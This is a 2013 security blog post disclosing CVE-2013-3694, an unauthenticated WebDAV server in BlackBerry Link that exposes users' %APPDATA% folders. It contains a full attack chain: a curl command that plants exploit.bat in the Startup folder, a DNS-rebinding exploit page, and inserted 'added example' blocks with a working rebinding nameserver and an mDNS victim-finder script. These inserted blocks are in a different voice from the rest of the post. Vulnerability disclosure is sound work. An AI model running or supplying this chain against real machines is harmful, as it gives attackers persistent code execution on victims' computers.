Tuesday, November 12, 2013

QNX

I remember being blown away by the QNX 1.44M demo as a teenager; it had a really big impact on me. At one time, I had even configured fvwm to look like QNX Photon. Here is a real screenshot of my desktop from May 2004 (an old configuration file of mine is still on the fvwm site):




Curious about what RIM have been doing with QNX since the acquisition, I bought a BlackBerry Q10.


If you connect a pristine BlackBerry 10 device to a computer, it identifies itself as a SCSI CD-ROM and ships an AUTORUN.INF so that a Windows host with AutoRun enabled launches the BlackBerry Link installer.


$ lsusb -d 0x0FCA:
Bus 002 Device 006: ID 0fca:8020 Research In Motion, Ltd.
$ cdrecord --devices
-------------------------------------------------------------------------
0  dev='/dev/sg1' rwrw-- : 'RIM' 'PlayBook CD'
-------------------------------------------------------------------------
$ isoinfo -l -i /dev/sr0

Directory listing of /
d---------   0    0    0            2048 Dec 19 2012 [     21 02]  .
d---------   0    0    0            2048 Dec 19 2012 [     21 02]  ..
----------   0    0    0              72 Dec 19 2012 [     28 00]  AUTORUN.INF
d---------   0    0    0            2048 Dec 19 2012 [     22 02]  BACKGROUND
----------   0    0    0           38198 Dec 19 2012 [     29 00]  BLACKBERRY LINK INSTALLATI.RTF
d---------   0    0    0            2048 Dec 19 2012 [     23 02]  DRIVERS
----------   0    0    0           95326 Dec 19 2012 [  19546 00]  README.RTF
----------   0    0    0        58251649 Dec 19 2012 [  19593 00]  START.DMG
----------   0    0    0          432808 Dec 19 2012 [     48 00]  START.EXE

Directory listing of /BACKGROUND/
d---------   0    0    0            2048 Dec 19 2012 [     22 02]  .
d---------   0    0    0            2048 Dec 19 2012 [     21 02]  ..
----------   0    0    0            5655 Dec 19 2012 [  48037 00]  BACKGROUND.PNG

Directory listing of /DRIVERS/
d---------   0    0    0            2048 Dec 19 2012 [     23 02]  .
d---------   0    0    0            2048 Dec 19 2012 [     21 02]  ..
----------   0    0    0        36311440 Dec 19 2012 [    260 00]  BLACKBERRYDEVICEMANAGER.EXE
----------   0    0    0         2038440 Dec 19 2012 [  17991 00]  BLACKBERRYLAUNCHER.EXE
----------   0    0    0           83032 Dec 19 2012 [  18987 00]  SETUP.EXE
----------   0    0    0              10 Dec 19 2012 [  19028 00]  VERSION.TXT
$ isoinfo -x /AUTORUN.INF -i /dev/sr0
[AutoRun]
shellexecute=start.exe
icon=start.exe
label=BlackBerry CD


BlackBerry Link is the synchronization and management software for BlackBerry 10, and I couldn't help noticing that it spawns an nginx process immediately after installation.




Locating the nginx configuration, I found it is being used as a WebDAV server, listening on an IPv6 address I didn't recognise (a unique local address in fd00::/8, not loopback). It appears to serve my %APPDATA% directory with no access control or authentication.


$ cat nginx.conf
...
       server {
               listen [fd0e:454e:f025:58dd:30e9:d752:1223:9cbf]:8080 default_server;
               server_name rimdav;
               location  / {
                       folder_config;
               }


...
               dav_access all:rw;


$ netstat -p TCPv6 -a
Active Connections


 Proto  Local Address          Foreign Address        State
 TCP    [::]:135               WIN-DBVU5A9QFHT:0      LISTENING
 TCP    [::]:445               WIN-DBVU5A9QFHT:0      LISTENING
 TCP    [::]:1025              WIN-DBVU5A9QFHT:0      LISTENING
 TCP    [::]:1026              WIN-DBVU5A9QFHT:0      LISTENING
 TCP    [::]:1027              WIN-DBVU5A9QFHT:0      LISTENING
 TCP    [::]:1029              WIN-DBVU5A9QFHT:0      LISTENING
 TCP    [::]:1032              WIN-DBVU5A9QFHT:0      LISTENING
 TCP    [::]:1047              WIN-DBVU5A9QFHT:0      LISTENING
 TCP    [::1]:1040             WIN-DBVU5A9QFHT:0      LISTENING
 TCP    [::1]:1040             WIN-DBVU5A9QFHT:1049   ESTABLISHED
 TCP    [::1]:1049             WIN-DBVU5A9QFHT:1040   ESTABLISHED
 TCP    [fd0e:454e:f025:58dd:30e9:d752:1223:9cbf]:8080  WIN-DBVU5A9QFHT:0      LISTENING
$ curl -g -X PUT --data "calc.exe" "http://[fd0e:454e:f025:58dd:30e9:d752:1223:9cbf]:8080/Start%20Menu/Programs/Startup/exploit.bat"


This looks wrong for several reasons. Apart from bypassing the NT security model (anything that can reach that socket reads and writes the files as the user running Link, with no credentials), the address is published over multicast DNS, so everyone on the local network can discover it.


The exploit is simple. A page you host cannot send a cross-origin PUT to that address with XMLHttpRequest (the browser would demand a CORS preflight the server never answers), so you use DNS rebinding to make a hostname you control resolve to the victim's address; the browser then treats the WebDAV share as same-origin, and you can read or write anywhere relative to the victim's %APPDATA% directory.


I wrote a quick IPv6 rebinding nameserver to test it. The idea is simply to extract two IPv6 addresses from the query labels and return one of them at random as an AAAA record with a very short (1 second) TTL. The attack will work on IPv4 networks as well, where you switch between returning one answer and zero answers for A queries, but I haven't implemented A record support.


It works like this:


$ host aabbccddeeffaabbccddeeffaabbccdd.112233445566778899aa112233445566.rbndr.us
aabbccddeeffaabbccddeeffaabbccdd.112233445566778899aa112233445566.rbndr.us has IPv6 address aabb:ccdd:eeff:aabb:ccdd:eeff:aabb:ccdd
$ host aabbccddeeffaabbccddeeffaabbccdd.112233445566778899aa112233445566.rbndr.us
aabbccddeeffaabbccddeeffaabbccdd.112233445566778899aa112233445566.rbndr.us has IPv6 address aabb:ccdd:eeff:aabb:ccdd:eeff:aabb:ccdd
$ host aabbccddeeffaabbccddeeffaabbccdd.112233445566778899aa112233445566.rbndr.us
aabbccddeeffaabbccddeeffaabbccdd.112233445566778899aa112233445566.rbndr.us has IPv6 address 1122:3344:5566:7788:99aa:1122:3344:5566
$ host aabbccddeeffaabbccddeeffaabbccdd.112233445566778899aa112233445566.rbndr.us
aabbccddeeffaabbccddeeffaabbccdd.112233445566778899aa112233445566.rbndr.us has IPv6 address aabb:ccdd:eeff:aabb:ccdd:eeff:aabb:ccdd
$ host aabbccddeeffaabbccddeeffaabbccdd.112233445566778899aa112233445566.rbndr.us
aabbccddeeffaabbccddeeffaabbccdd.112233445566778899aa112233445566.rbndr.us has IPv6 address 1122:3344:5566:7788:99aa:1122:3344:5566


As you can see, it returns one of the two addresses encoded in the query labels at random, so the name flips between a host you control and a host you don't.
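As an added example (not the post's own nameserver, which isn't published here), this is a minimal authoritative server for an IPv6 rebinding zone built the way the text describes: the two 32-hex-digit labels are decoded into IPv6 addresses, one is returned at random with a 1 second TTL, A queries get an empty NOERROR answer and anything outside the scheme gets NXDOMAIN. The zone name `rbndr.us`, the transaction id used for self-testing and the helper names are assumptions; it needs the zone delegated to the host it runs on and root for port 53.

```python
# Added example, not the post's own nameserver: a minimal authoritative DNS server
# for an IPv6 rebinding zone, as described above. A query for <hex32>.<hex32>.ZONE
# gets one of the two encoded addresses at random with a 1 second TTL, so the next
# lookup may land on the other one. Assumes ZONE is delegated to this host and
# that it runs as root (port 53). Python 3, standard library only.
import random
import socket
import struct

ZONE = "rbndr.us"    # assumed zone, as in the transcript above
TTL = 1              # seconds; browsers re-resolve almost immediately
QTYPE_A, QTYPE_AAAA = 1, 28

def label_to_ipv6(label):
    """'aabbccddeeffaabbccddeeffaabbccdd' -> 'aabb:ccdd:eeff:aabb:ccdd:eeff:aabb:ccdd'."""
    if len(label) != 32:
        raise ValueError("expected 32 hex digits: %r" % label)
    return socket.inet_ntop(socket.AF_INET6, bytes.fromhex(label))

def candidates(qname):
    """(addr1, addr2) encoded in qname, or None when qname is not <hex32>.<hex32>.ZONE."""
    labels = qname.rstrip(".").lower().split(".")
    zone = ZONE.split(".")
    if len(labels) != 2 + len(zone) or labels[2:] != zone:
        return None
    try:
        return (label_to_ipv6(labels[0]), label_to_ipv6(labels[1]))
    except ValueError:                            # not hex
        return None

def encode_name(qname):
    return b"".join(bytes([len(p)]) + p.encode("ascii")
                    for p in qname.rstrip(".").split(".")) + b"\x00"

def build_query(qname, qtype=QTYPE_AAAA, txid=0x1234):
    """The recursion-desired query a resolver sends us (used here for self-testing)."""
    return (struct.pack("!HHHHHH", txid, 0x0100, 1, 0, 0, 0)
            + encode_name(qname) + struct.pack("!HH", qtype, 1))

def parse_question(packet):
    """Return (txid, qname, qtype, offset just past the question section)."""
    txid = struct.unpack("!H", packet[:2])[0]
    off, parts = 12, []
    while packet[off]:
        n = packet[off]
        parts.append(packet[off + 1:off + 1 + n].decode("ascii"))
        off += 1 + n
    off += 1                                      # terminating zero label
    qtype = struct.unpack("!H", packet[off:off + 2])[0]
    return txid, ".".join(parts), qtype, off + 4  # skip qtype + qclass

def build_response(query, rng=random):
    """AAAA -> one encoded address at random; A -> NOERROR with no answers
    (there is no IPv4 side in this version); other names -> NXDOMAIN."""
    txid, qname, qtype, qend = parse_question(query)
    question = query[12:qend]
    addrs = candidates(qname)
    if addrs is None:
        return struct.pack("!HHHHHH", txid, 0x8583, 1, 0, 0, 0) + question   # AA, NXDOMAIN
    if qtype != QTYPE_AAAA:
        return struct.pack("!HHHHHH", txid, 0x8580, 1, 0, 0, 0) + question   # AA, no answers
    rdata = socket.inet_pton(socket.AF_INET6, rng.choice(addrs))
    rr = b"\xc0\x0c" + struct.pack("!HHIH", QTYPE_AAAA, 1, TTL, 16) + rdata  # name = pointer to question
    return struct.pack("!HHHHHH", txid, 0x8580, 1, 1, 0, 0) + question + rr

def answer_address(response):
    """The AAAA address in a response built above, or None if it carries no answer."""
    if struct.unpack("!H", response[6:8])[0] == 0:
        return None
    _, _, _, qend = parse_question(response)
    return socket.inet_ntop(socket.AF_INET6, response[qend + 12:qend + 28])

def observed_addresses(qname, n=200):
    """Resolve qname n times through build_response; the set of answers seen."""
    q = build_query(qname)
    return {answer_address(build_response(q)) for _ in range(n)}

def serve(bind="::", port=53):
    sock = socket.socket(socket.AF_INET6, socket.SOCK_DGRAM)
    sock.bind((bind, port))
    while True:
        query, peer = sock.recvfrom(512)
        try:
            sock.sendto(build_response(query), peer)
        except (IndexError, struct.error, UnicodeDecodeError):
            pass                                  # malformed query: drop it

if __name__ == "__main__":
    serve()
```

Querying `aabbccddeeffaabbccddeeffaabbccdd.112233445566778899aa112233445566.rbndr.us` against it produces the alternation shown in the transcript; the 1 second TTL only matters if the victim's resolver and browser honour it, which is why the exploit page below keeps retrying rather than assuming a single rebind.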


So let's search for a victim on my network. You can use dig to send a PTR query for _bp2p._tcp.local to the mDNS multicast address 224.0.0.251 on port 5353, or avahi-browse if you have it:


$ avahi-browse -r -t _bp2p._tcp
+   eth0 IPv4 webdav_B309F0A0D86BA5EF_7846FB91C6A398A5      _bp2p._tcp           local
+   eth0 IPv4 Friendly_DA52877F19217E9B_7A0D69D13ECAE391    _bp2p._tcp           local
=   eth0 IPv4 webdav_B309F0A0D86BA5EF_7846FB91C6A398A5      _bp2p._tcp           local
  hostname = [3c222e49b3165fda656214723f757f.local]
  address = [fd3c:222e:49b3:165f:da65:6214:723f:757f]
  port = [8080]
  txt = []
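As an added example (not code from the post), the following builds the PTR query that dig or avahi-browse sends for `_bp2p._tcp.local` and joins the PTR, SRV and AAAA records a responder answers with into the instance, hostname, port and address avahi-browse printed above. The `sample_response()` packet is constructed here from the values in that output, not captured from a device; `discover()` does the same thing live on the local network.

```python
# Added example, not code from the post: build the PTR query that dig or
# avahi-browse sends for _bp2p._tcp.local and parse the PTR -> SRV -> AAAA
# chain a BlackBerry Link host answers with. sample_response() is constructed
# from the avahi-browse output above; it is not a capture. Python 3, stdlib only.
import socket
import struct

MDNS_GROUP, MDNS_PORT = "224.0.0.251", 5353
PTR, AAAA, SRV = 12, 28, 33
SERVICE = "_bp2p._tcp.local"
# Values taken from the avahi-browse output above.
INSTANCE = "webdav_B309F0A0D86BA5EF_7846FB91C6A398A5"
HOST = "3c222e49b3165fda656214723f757f.local"
ADDR = "fd3c:222e:49b3:165f:da65:6214:723f:757f"

def encode_name(name):
    return b"".join(bytes([len(p)]) + p.encode() for p in name.rstrip(".").split(".")) + b"\x00"

def ptr(off):
    """Name compression pointer to an earlier occurrence of a name."""
    return struct.pack("!H", 0xC000 | off)

def read_name(pkt, off):
    """Decode a (possibly compressed) name; return (name, offset just past it in the stream)."""
    parts, end = [], None
    while True:
        n = pkt[off]
        if (n & 0xC0) == 0xC0:                    # pointer: jump, but remember where we were
            if end is None:
                end = off + 2
            off = struct.unpack("!H", pkt[off:off + 2])[0] & 0x3FFF
            continue
        off += 1
        if n == 0:
            break
        parts.append(pkt[off:off + n].decode())
        off += n
    return ".".join(parts), (off if end is None else end)

def build_query(service=SERVICE):
    """mDNS query: txid 0, one PTR question for the service type, multicast reply requested."""
    return struct.pack("!HHHHHH", 0, 0, 1, 0, 0, 0) + encode_name(service) + struct.pack("!HH", PTR, 1)

def parse_records(pkt):
    """Yield (name, type, rdata_offset, rdata) for each answer/authority/additional record."""
    _, _, qd, an, ns, ar = struct.unpack("!HHHHHH", pkt[:12])
    off = 12
    for _ in range(qd):                            # skip questions
        _, off = read_name(pkt, off)
        off += 4
    for _ in range(an + ns + ar):
        name, off = read_name(pkt, off)
        rtype, _, _, rdlen = struct.unpack("!HHIH", pkt[off:off + 10])
        off += 10
        yield name, rtype, off, pkt[off:off + rdlen]
        off += rdlen

def find_services(pkt, service=SERVICE):
    """Join PTR -> SRV -> AAAA into {instance, host, port, addresses} dicts."""
    recs = list(parse_records(pkt))
    addrs = {}
    for name, rtype, _, rdata in recs:
        if rtype == AAAA:
            addrs.setdefault(name, []).append(socket.inet_ntop(socket.AF_INET6, rdata))
    found = []
    for name, rtype, roff, _ in recs:
        if rtype != PTR or name != service:
            continue
        instance, _ = read_name(pkt, roff)        # PTR rdata is the instance name
        for n2, t2, roff2, rd2 in recs:
            if t2 == SRV and n2 == instance:
                port = struct.unpack("!H", rd2[4:6])[0]           # priority, weight, port, target
                target, _ = read_name(pkt, roff2 + 6)
                found.append({"instance": instance, "host": target,
                              "port": port, "addresses": addrs.get(target, [])})
    return found

def discover(service=SERVICE, timeout=2.0):
    """Live version: multicast the query and parse every reply received within timeout."""
    s = socket.socket(socket.AF_INET, socket.SOCK_DGRAM)
    s.settimeout(timeout)
    s.sendto(build_query(service), (MDNS_GROUP, MDNS_PORT))
    results = []
    try:
        while True:
            pkt, _ = s.recvfrom(9000)
            results.extend(find_services(pkt, service))
    except socket.timeout:
        pass
    return results

def sample_response():
    """Constructed reply laid out the way a responder would, including name compression."""
    pkt = struct.pack("!HHHHHH", 0, 0x8400, 0, 3, 0, 0)          # response, authoritative, 3 answers
    svc_off = len(pkt)
    svc = encode_name(SERVICE)
    inst_off = svc_off + len(svc) + 10
    inst_rdata = bytes([len(INSTANCE)]) + INSTANCE.encode() + ptr(svc_off)
    pkt += svc + struct.pack("!HHIH", PTR, 1, 4500, len(inst_rdata)) + inst_rdata
    host_off = len(pkt) + 2 + 10 + 6
    srv_rdata = struct.pack("!HHH", 0, 0, 8080) + encode_name(HOST)
    pkt += ptr(inst_off) + struct.pack("!HHIH", SRV, 0x8001, 120, len(srv_rdata)) + srv_rdata
    pkt += ptr(host_off) + struct.pack("!HHIH", AAAA, 0x8001, 120, 16) \
           + socket.inet_pton(socket.AF_INET6, ADDR)
    return pkt
```

`find_services(sample_response())` yields the one `webdav_…` instance on `3c222e49b3165fda656214723f757f.local` port 8080 at `fd3c:222e:49b3:165f:da65:6214:723f:757f`; everything an attacker needs for the rebinding labels and the iframe port is in that record set, which is the point of the mDNS complaint above.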


Then I start an HTTP server on my machine on the matching port (8080):


$ python
Python 2.7.3 (default, Sep 26 2013, 20:03:06)
[GCC 4.6.3] on linux2
Type "help", "copyright", "credits" or "license" for more information.
>>> import socket
>>> from BaseHTTPServer import HTTPServer
>>> from SimpleHTTPServer import SimpleHTTPRequestHandler
>>>
>>> class HTTPServerV6(HTTPServer):
...  address_family = socket.AF_INET6
...
>>> HTTPServerV6(('::', 8080), SimpleHTTPRequestHandler).serve_forever()


I send the victim a link to a page that keeps reloading http://aabbccddeeffaabbccddeeffaabbccdd.112233445566778899aa112233445566.rbndr.us:8080 in an iframe until the name resolves to the server I control, which then returns something like this:


<html>
<head></head>
<body>
<h1>Please Wait...</h1>

<script>
   // Where you want to write to on victim, relative to %APPDATA%.
   var path   = "/Start%20Menu/Programs/Startup/exploit.bat";

   // What you want to write there.
   var data   = "calc.exe";

   // Synchronous PUT to the page's own origin. While the name still resolves
   // to the attacker's server this just hits that server; once the 1 second
   // TTL expires and the name rebinds to the victim's address, the same
   // same-origin request lands on the WebDAV listener on port 8080.
   function sendRequest()
   {
       var xhr = new XMLHttpRequest();
       xhr.open("PUT", document.location.origin + path, false);
       xhr.send(data);
   }

   // Keep retrying once a second until the rebind happens.
   setInterval(sendRequest, 1000);
</script>
</body>
</html>


After a few seconds the name rebinds to the victim's address and the browser PUTs the batch file into their Startup directory, where it runs at the next logon. I verified this works with the latest BlackBerry Link on Windows 7.


This vulnerability is CVE-2013-3694, which RIM are scheduled to resolve today.
